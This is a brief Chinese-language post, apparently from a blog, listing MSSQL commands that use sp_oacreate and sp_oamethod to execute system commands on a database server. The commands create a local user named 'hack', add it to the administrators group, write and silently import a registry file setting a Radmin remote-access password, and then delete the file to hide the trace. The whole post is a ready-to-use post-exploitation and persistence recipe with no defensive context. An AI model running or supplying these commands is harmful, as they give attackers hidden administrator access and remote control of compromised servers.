mssql 加帳號命令

2021-04-02 23:41:01 字數 1217 閱讀 3706


declare @cmd int exec sp_oacreate '',@cmd output exec sp_oamethod @cmd,'run',null,'net user hack hack /add','0','true'

declare @cmd int

exec sp_oacreate '',@cmd output

exec sp_oamethod @cmd,'run',null,'net localgroup administrators hack /add','0','true'


declare @cmd int exec sp_oacreate '',@cmd output exec sp_oamethod @cmd,'run',null,'cmd.exe /c echo windows registry editor version 5.00 > hack123.reg','0','true'

declare @cmd int exec sp_oacreate '',@cmd output exec sp_oamethod @cmd,'run',null,'cmd.exe /c echo [hkey_local_machine/system/radmin/v2.0/server/parameters] >> hack123.reg','0','true'

declare @cmd int exec sp_oacreate '',@cmd output exec sp_oamethod @cmd,'run',null,'cmd.exe /c echo "parameter"=hex:cf,c5,34,37,ad,b4,b7,63,5c,da,9f,d0,fc,61,f0,0b >> hack123.reg','0','true'

declare @cmd int exec sp_oacreate '',@cmd output exec sp_oamethod @cmd,'run',null,'regedit /s hack123.reg','0','true'

declare @cmd int exec sp_oacreate '',@cmd output exec sp_oamethod @cmd,'run',null,'cmd.exe /c del hack123.reg /f /q','0','true'

MS SQL帳號解鎖處理

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MSSQL 常用命令

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